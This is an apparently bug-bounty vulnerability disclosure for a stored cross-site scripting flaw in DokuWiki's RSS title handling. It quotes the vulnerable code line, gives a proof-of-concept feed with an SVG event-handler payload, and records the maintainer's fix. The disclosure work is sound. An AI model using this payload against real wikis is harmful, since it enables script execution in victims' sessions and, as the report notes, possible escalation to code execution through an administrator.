Stored cross-site scripting via RSS feed in splitbrain/dokuwiki


Reported on

May 13th 2023


Due to the improper handling of RSS titles in inc/parser/xhtml.php, a malicious RSS feed can be used to inject arbitrary HTML elements into the page, resulting in cross-site scripting.

inc/parser/xhtml.php line 1292-1294

                } else {
                    $this->doc .= ' '.$item->get_title();

Proof of Concept

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="" xml:lang="en-US">
    <title type="text">test</title>
        <title type="html"><![CDATA[<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s></animate></svg>]]></title>

Steps to reproduce

1​. Write the following contents to a page: (This URL contains the PoC above.)


2​. Confirm that alert(document.domain) is executed after saving the page.


An attacker can execute arbitrary JavaScript on Dokuwiki origin. Since administrators can install plugins, this could result in remote code execution if the administrator opens a page with crafted content.

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. 12 days ago
We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back 11 days ago
Andreas Gohr
11 days ago


Thanks for the report. Fix is in progress

Andreas Gohr validated this vulnerability 10 days ago
RyotaK has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Andreas Gohr marked this as fixed in 2023-04-04a with commit 53df38 10 days ago
Andreas Gohr has been awarded the fix bounty
This vulnerability will not receive a CVE
Andreas Gohr published this vulnerability 10 days ago
xhtml.php#L1292-L1294 has been validated
10 days ago


Hi @splitbrain, thank you so much for fixing this issue! Can you please assign a CVE ID for this?

to join this conversation